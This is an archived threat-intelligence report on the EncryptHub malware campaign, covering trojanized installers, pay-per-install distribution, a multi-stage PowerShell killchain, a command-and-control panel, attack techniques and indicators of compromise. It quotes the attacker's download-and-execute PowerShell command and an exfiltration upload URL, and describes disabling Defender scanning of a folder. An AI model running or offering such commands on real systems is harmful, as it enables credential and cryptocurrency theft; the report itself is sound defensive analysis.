{
	"id": "f9a46743-1856-4a27-903d-2794b8719ff1",
	"created_at": "2026-04-06T00:16:11.01159Z",
	"updated_at": "2026-04-10T13:12:41.290441Z",
	"deleted_at": null,
	"sha1_hash": "a471cf867c5d619585167646c146c7fd73f312b0",
	"title": "Unveiling EncryptHub: Analysis of a multi-stage malware campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1575075,
	"plain_text": "Unveiling EncryptHub: Analysis of a multi-stage malware\r\ncampaign\r\nBy mpeintner\r\nPublished: 2025-03-06 · Archived: 2026-04-05 21:30:51 UTC\r\nResearch \u0026 Threat Intel Last updated: 10 Nov 2025\r\nEncryptHub, a rising cybercriminal entity, has recently caught the attention of multiple threat intelligence teams,\r\nincluding our own (Outpost24’s KrakenLabs). While other reports have begun to shed light on this actor’s\r\noperations, our investigation goes a step further, uncovering previously unseen aspects of their infrastructure,\r\ntooling, and behavioral patterns. \r\nThrough a series of operational security (OPSEC) missteps, EncryptHub inadvertently exposed critical elements\r\nof their ecosystem, allowing us to map their tactics with unprecedented depth. Their lapses include directory\r\nlisting enabled on key infrastructure components, hosting stealer logs alongside malware executables and\r\nPowerShell scripts, and revealing Telegram bot configurations used for data exfiltration and campaign tracking.  \r\nThese mistakes provided us with a unique vantage point into their operations, enabling us to dissect their attack\r\nchain and methodologies in ways that have not yet been publicly detailed. \r\nIn this first part of our report, we will explore EncryptHub’s tactics, infrastructure, and tradecraft, exposing the\r\nextent of their operational footprint. And we’re not stopping there—stay tuned for Part 2, where we’ll reveal even\r\nmore surprises about this threat actor. \r\nEncryptHub: Threat actor executive summary \r\nMulti-stage attack chains: EncryptHub’s campaigns use several layers of PowerShell scripts to gather\r\nsystem data, exfiltrate valuable information, execute evasion techniques, inject malicious payloads (often\r\nembedded in Base64), and deploy further information stealers. \r\nDistribution: EncryptHub has been observed targeting users of popular applications, by distributing\r\ntrojanized versions. 
Furthermore, the threat actor has also made use of third-party Pay-Per-Install (PPI)\r\ndistribution services. \r\nTarget prioritization: The attacker prioritizes credential logs stolen from victims’ systems based on key\r\nattributes such as cryptocurrency ownership, corporate network affiliation, and the presence of VPN\r\nsoftware. \r\nPreparing for sales: The threat actor is developing a product called “EncryptRAT”—a remote access tool\r\nfeaturing a command-and-control (C2) panel capable of managing infections from different information\r\nstealers and additional modules. There are signs that the threat actor is planning on selling or distributing it\r\nin the near future. \r\nhttps://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/\r\nPage 1 of 15\n\nVulnerability targeting: EncryptHub seems to be paying close attention to the cybersecurity landscape\r\nand tries to incorporate popular vulnerabilities into their campaigns. \r\nFigure 1: EncryptHub’s diamond model diagram by Outpost24’s KrakenLabs.\r\nDistribution channels and tactics \r\nEncryptHub has been testing and employing various methods and lures with the aim of deploying malware without\r\ntriggering alerts or raising victims’ suspicions. We begin by examining the more classical approach: how they\r\nused trojanized applications—disguised as legitimate software—to try to gain access to unsuspecting victims’\r\nsystems and execute malicious operations. \r\nFollowing that, we explore the role of a more novel distribution technique that has been increasing in popularity in\r\nthe last few years: the use of third-party distribution through platforms like LabInstalls. This helps attackers\r\nstreamline the deployment of harmful payloads via automated, pay-per-install services. 
\r\nTrojanized applications \r\nEncryptHub has been observed spreading counterfeit versions of widely used applications such as QQ Talk, QQ\r\nInstaller, WeChat, DingTalk, VooV Meeting, Google Meet, Microsoft Visual Studio 2022, and Palo Alto\r\nGlobal Protect. By creating fake, trojanized versions of these applications, the threat actor exploits the inherent\r\ntrust users place in these popular tools. These trojanized applications were generated between November 25th, 2024, and January 1st, 2025. \r\nOnce installed, these trojanized applications serve as a delivery mechanism for subsequent malicious payloads.\r\nThey not only enable initial access but may also provide elevated privileges and persistence, thereby enabling\r\nlateral movement and data exfiltration. \r\nBy imitating genuine application installers, EncryptHub reduces user suspicion and bypasses some automated\r\nsecurity checks. The counterfeit applications appear familiar and trustworthy, essential factors for a successful\r\nmalware distribution campaign. \r\nFigure 2: Screenshot of phishing domain paloaltonworks[.]com that led to the installation of a\r\ntrojanized version of the Palo Alto GlobalProtect application. The image was seen in a Telegram\r\nchannel associated with EncryptHub campaigns.\r\nAll the trojanized applications we analyzed were signed with the following code-signing certificate, which has\r\nalready been revoked: \r\nName HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES COMPANY \r\nStatus Trust for this certificate or one of the certificates in the certificate chain has been revoked. 
\r\nIssuer GlobalSign GCC R45 EV CodeSigning CA 2020 \r\nValid From 01:54 AM 11/25/2024 \r\nValid To 01:54 AM 11/26/2025 \r\nValid Usage Code Signing \r\nAlgorithm sha256RSA \r\nThumbprint A0CA753F0845B420E3F25E200B81D9936E731875 \r\nSerial Number 1F DB 22 03 07 68 A9 CF 31 F2 A9 6A \r\nThese applications have a PowerShell script embedded that downloads the file worker.ps1. Then, worker.ps1\r\nretrieves system information including external IP address, username, computer name, location (country and city),\r\nOS version, domain name, build type, and administrator status, and the data is sent back to the remote server\r\n(“http://[C2 server]:8080”) via a POST request. \r\nWe observed the script connecting to encrypthub_steal.ps1, which contains strings indicating it is likely a\r\nKematian Stealer sample. It also connected to the PowerShell script message.ps1, which gathers information about\r\nthe system and sends it to the remote server. \r\nOn February 4th, 2025, the threat actor started to use another code-signing certificate: \r\nName Encrypthub LLC \r\nStatus Valid \r\nIssuer Encrypthub LLC \r\nValid From 2025-02-04 01:41:04 \r\nValid To 2026-02-04 02:01:04 \r\nValid Usage Code Signing \r\nAlgorithm sha256RSA \r\nThumbprint 32AA32BAA3AF74C1710764FCA0E5214ABBEEC455\r\nSerial Number 2E AB A5 BD 3C 3B 4A B1 43 66 E4 09 6C 70 87 B0 \r\nThird-party distribution via LabInstalls \r\nA notable element in EncryptHub’s distribution chain has been the use of a third-party service dubbed\r\n“LabInstalls” since at least January 2nd, 2025. LabInstalls operates as a pay-per-install (PPI) broker for malicious\r\nexecutables (.exe) and PowerShell scripts (.ps1). Their platform is designed to facilitate bulk “installs” for\r\ncybercriminal customers, enabling the rapid dissemination of malware. 
\r\nThe service employs a fully automated Telegram bot (@labInstalls_bot) that manages customer interactions and\r\ninstallation purchases. \r\nFigure 3: LabInstalls’ thread on the XSS underground forum offering the installation\r\nservices for sale via Telegram bot. \r\nEncryptHub indeed confirmed being their client by leaving positive feedback in LabInstalls’ sales thread on the\r\ntop-tier Russian-speaking underground forum XSS, even including a screenshot that evidences the use of the\r\nservice. The threat actor most likely hired this service to ease the burden of distribution and expand the number of\r\ntargets that his malware could reach. \r\nInstallation services streamline the deployment of malicious installers, automating the process and obscuring the\r\nmalicious origins of the payloads. \r\nFigure 4. EncryptHub’s positive feedback as a client of the LabInstalls service on the Russian-speaking underground forum XSS. \r\nEncryptHub’s evolving killchain \r\nThroughout the last few months, EncryptHub has been experimenting, adding tweaks and slowly evolving their\r\nkillchain over time. In this article, however, we will focus on the latest version we observed at the time of writing,\r\na version they started using around February 13th, 2025. \r\nThis killchain illustrates EncryptHub’s evolving strategy to deploy information-stealing malware through a multi-stage process. \r\nFigure 5. 
EncryptHub’s killchain steps.\r\nInitial execution \r\nThe following command is executed on the victim’s machine: \r\npowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Invoke-RestMethod -Uri 'hxxps://encrypthub[.]us/encrypthub/fickle/payload.ps1' | Invoke-Expression\" \r\nThis command downloads payload.ps1, which is personalized with the attacker’s build ID (in this case,\r\nencrypthub). \r\n1st stage – payload.ps1 \r\nHash: 90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd \r\npayload.ps1 is responsible for stealing sensitive data. Its operation can be summarized as follows: \r\n1. Instance check: The script first verifies whether another instance is already running on the victim’s\r\nmachine. If no instance is detected, it proceeds. \r\n2. Data exfiltration: \r\na. Messaging sessions: Limited to Telegram. \r\nb. Crypto wallets: Targeting both browser-based and desktop wallets. \r\nc. Password manager files: Extracted from browsers and password management extensions. \r\nd. Files: With specific extensions and containing particular keywords. \r\ne. VPN sessions: (For now, only those associated with PaloAltoGP.) \r\n3. System information collection: It gathers basic system details (e.g., Windows version, CPU, GPU) and\r\nattempts to detect any installed antivirus software. \r\n4. Cookie theft: An embedded, base64-encoded executable is decoded and executed to harvest browser\r\ncookies. It is the Go version of Kematian Stealer available on GitHub. \r\n5. Data storage and exfiltration: All stolen information is saved in a directory within the temporary folder.\r\nOnce data collection is complete: \r\na. The script deletes any empty subdirectories. \r\nb. 
It compresses the collected data and sends it to: \r\n$($serveruri):8081/upload_file?filename=$base64FileName\u0026buildType=$base64BuildType \r\nwhere $serveruri is, in this case, encrypthub[.]us. \r\n6. Reporting \r\nThe script tallies the number of stolen cookies, passwords, wallets, and emails, then sends this data along\r\nwith system information to $($serveruri):8081. After reporting, the temporary directory is deleted. \r\n7. Secondary payload execution \r\nFinally, the script downloads and executes another script from: \r\n$($serveruri)/$build/ram/runner.ps1\r\nThis file is saved under a randomly generated name and executed. \r\nStage 2 – runner.ps1 \r\nHash: 1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1 \r\nrunner.ps1 is executed with the following command: \r\npowershell.exe -ArgumentList \"-ExecutionPolicy Bypass -NoProfile -File `\"$downloadPath`\"\" -WindowStyle Hidden \r\nThis script contains two base64-encoded .msc files. MSC files (Microsoft Common Console Documents) are\r\nXML-based snap-in control files used with the Microsoft Management Console (MMC) for administrative tasks. \r\nThe actions performed by runner.ps1 include: \r\n1. Decoding and storage \r\na. Decodes each MSC file. \r\nb. Saves them in two subfolders created within its current directory. \r\n2. Modification and execution \r\na. Modifies one of the MSC files to embed the URL hxxps://encrypthub[.]us/encrypthub/ram/. \r\nb. Executes the unmodified MSC file, which in turn runs the modified version. \r\nc. The modified file leverages a Shockwave Flash Object from an ActiveX control to open a web browser\r\nand navigate to the specified URL. \r\n3. Cleanup \r\na. Pauses for 30 seconds. \r\nb. Deletes all created folders before exiting. 
\r\nStage 3 – HTML Loader \r\nWithin the code hosted at hxxps://encrypthub[.]us/encrypthub/ram/, three PowerShell commands are executed,\r\nperforming the following actions: \r\n1. TEMP folder exclusion \r\nInstructs Windows Defender to exclude the TEMP folder from its scans. \r\n2. Secondary script download and execution \r\nDownloads and runs another script from: \r\nhxxps://encrypthub.us/encrypthub/ram/ram.ps1\r\n3. Termination of MMC process \r\nKills the mmc process, which is launched when the MSC scripts are executed. \r\nStage 4 – Rhadamanthys deployment \r\nHash: 411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd \r\nram.ps1 is a minimal script comprising only two lines: \r\n1. Download of executable: Downloads hxxps://encrypthub.us/encrypthub/ram/ram.exe (a sample of\r\nRhadamanthys) and saves it to the TEMP folder as transport.exe. \r\n2. Execution: Executes transport.exe and waits for its completion. \r\nEncryptRAT panel \r\nAlong with the evolution of the killchain, EncryptHub has also been developing and improving EncryptRAT, a\r\ncommand-and-control (C2) panel that he has been using to manage infections. In the development stage\r\nat the time of writing, this tool allows the user to: \r\nManage active infections. \r\nSend remote commands. \r\nManage additional modules. \r\nMonitor and download logs from infected devices. \r\nConfigure various malware samples. \r\nConfigure exfiltration channels. \r\nEarly tests suggest that EncryptHub may soon commercialize EncryptRAT, offering it to other threat actors. This\r\nis strongly suggested by the fact that in recent updates the threat actor has added support for multiple users,\r\nlinking those to BuildIDs associated with the different samples, allowing the segregation of both malware and\r\nexfiltrated data. 
\r\nFigure 6: Infection results view.\r\nFigure 7: Malware configuration panel.\r\nKey takeaways \r\nOur comprehensive analysis of EncryptHub reveals a financially motivated threat actor employing a multi-stage\r\nattack chain—one that leverages both in-house tools and third-party distribution channels. Despite significant\r\nOPSEC oversights, EncryptHub continues to evolve its tactics, underlining the critical need for continuous\r\nmonitoring and proactive defense measures. Organizations must remain vigilant and adopt multi-layered security\r\nstrategies to mitigate the risks posed by such adversaries. \r\nWant to know whether your organization is being discussed on the dark web? Outpost24’s External Attack Surface\r\nManagement (EASM) platform now includes a dark web module that gives users access to threat intelligence\r\npowered by our human-led team, KrakenLabs. Get in touch to learn more or read in part 2 how EncryptHub’s\r\ncybercrime journey started and how he used ChatGPT as an accomplice.\r\nReferences \r\nFor further information, see below a list of references from other cybersecurity companies that reported on\r\nEncryptHub activities: \r\nFortinet. (2024, June 19). Fickle Stealer Distributed via Multiple Attack Chain \r\nSonicWall. (2024, August 5). Beware of Fake WinRar Websites: Malware Hosted on GitHub \r\nProdaft. (2025, February 19). 
LARVA-208 \r\nTTPs\r\nResource Development \r\nStage Capabilities: Drive-by Target (T1608.004) \r\nInitial Access \r\nExploitation of Remote Services (T1210) \r\nExecution \r\nCommand and Scripting Interpreter: PowerShell (T1059.001) \r\nDefense Evasion \r\nObfuscated Files or Information (T1027) \r\nImpair Defenses (T1562.001) \r\nCredential Access \r\nCredentials from Password Stores (T1555.003) \r\nData from Information Repositories (T1213) \r\nDiscovery \r\nSystem Information Discovery (T1082) \r\nCollection \r\nData from Local System (T1005) \r\nExfiltration \r\nExfiltration Over Web Service (T1567.002) \r\nExfiltration Over Command and Control Channel (T1041) \r\nCommand and Control \r\nApplication Layer Protocol: Web Protocol (T1071.001) \r\nRemote Access Tools (T1219) \r\nIndicators of compromise (IOCs) \r\nDistribution (files code-signed by EncryptHub LLC) \r\n532f4c9c72f1c77531a55f7811371aa65f85fc3a768d792482cab3381cdd29b3 (connect.exe) \r\n4af6e5a266577ccc2dca9fcbe2f56a9673947f6f3b5b9d1d7eb740613fce80d4 (reCAPCHA.exe) \r\n1661e8f8758526f913e4400af8dbfa7587794ba9345f299fa50373c7140e5819 (buzztalk_weaponised.exe) \r\nf687fe9966f7a2cb6fdc344d62786958edc4a9d9b8389a0e2fea9907f90cfde2 (google-meets.exe) \r\nDistribution (files code-signed by HOA SEN HA NAM ONE MEMBER LIMITED LIABILITIES\r\nCOMPANY) 
\r\nRelated files \r\n21b99435d0cf1f9845feb795c83cbf9d10211e6bc26460f4cdcfcd57569054fe (worker.ps1) \r\n381695385bde0f96ad93dcbab79b3fc40f84e497c0b6afd087d2f1a2fbf824c3 (encrypthub_steal.ps1) \r\n9d9829ff50f5195ef4c1ebee6cf430c013ad47665657ef9a6c3bc0b9911a40c4 (message.ps1) \r\n1st stage – payload.ps1 \r\n90b7b711f56f00a1fa08a7a29f2cd8602b8aa1a0d78986dbfc9f64e38ac6cecd \r\nEmbedded cookie grabber (Kematian Stealer Go version) \r\nEcb7ee118b68b178e62b68a7e2aaee85bafc8b721cb9cee30d009a0c96e59cef \r\nStage 2 – runner.ps1 \r\n1bce694f9f811982eb01d381a69cdd56c3fa81d113e41b5acb902ec66ec942b1 (runner.ps1) \r\nf2836437090bfb8ff878c9a8aee28e036adc4ad7c73a51623c5c6ff12445a741 (fake WmiMgmt.msc) \r\nStage 3 – HTML Loader \r\n07397a113756805501a3f73a027977011849a90053f2a966053711f442d21b8d \r\nStage 4 – Rhadamanthys deployment \r\n411e6413afc5dadc63f69dd37d25f23dfee1fbd5eff1a591ba33dfc38ca5a4fd (ram.ps1) \r\n06628b0447c94dd270ecaf798bd052891cda386d504a20d439eb994004ff483c (ram.exe) \r\nC2 Rhadamanthys \r\nhxxps://85.234.100[.]177/b97c5970b3a1f0ccc/iwbsn37q.xl2a8 \r\nOther IOCs – seen in January and February 2025 \r\ne4fc16fb36a5cd9e8d7dfe42482e111c7ce91467f6ac100a0e76740b491df2d4 (stealc.exe) \r\n977198c47d5e7f049c468135f5bde776c20dcd40e8a2ed5adb7717c2c44be5b9 (nThread.dll) \r\nfcfb94820cb2abbe80bdb491c98ede8e6cfa294fa8faf9bea09a9b9ceae35bf3 (CFF Explorer.exe) \r\nDomains 
\r\nIPs \r\nURLs related to the use of LabInstalls \r\nAbout the Author\r\nOutpost24’s Cyber Threat Intelligence team helps businesses stay ahead of malicious actors in the ever-evolving\r\nthreat landscape, helping you keep your assets and brand reputation safe. With a comprehensive threat hunting\r\ninfrastructure, our Threat Intelligence solution covers a broad range of threats on the market to help your business\r\ndetect and deter external threats.\r\nSource: https://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://outpost24.com/blog/unveiling-encrypthub-multi-stage-malware/"
	],
	"report_names": [
		"unveiling-encrypthub-multi-stage-malware"
	],
	"threat_actors": [
		{
			"id": "af10aec6-36a8-4bdb-ba47-8f75b6a4aa4b",
			"created_at": "2025-03-07T02:00:03.797427Z",
			"updated_at": "2026-04-10T02:00:03.821929Z",
			"deleted_at": null,
			"main_name": "Larva-208",
			"aliases": [
				"EncryptHub"
			],
			"source_name": "MISPGALAXY:Larva-208",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434571,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a471cf867c5d619585167646c146c7fd73f312b0.pdf",
		"text": "https://archive.orkl.eu/a471cf867c5d619585167646c146c7fd73f312b0.txt",
		"img": "https://archive.orkl.eu/a471cf867c5d619585167646c146c7fd73f312b0.jpg"
	}
}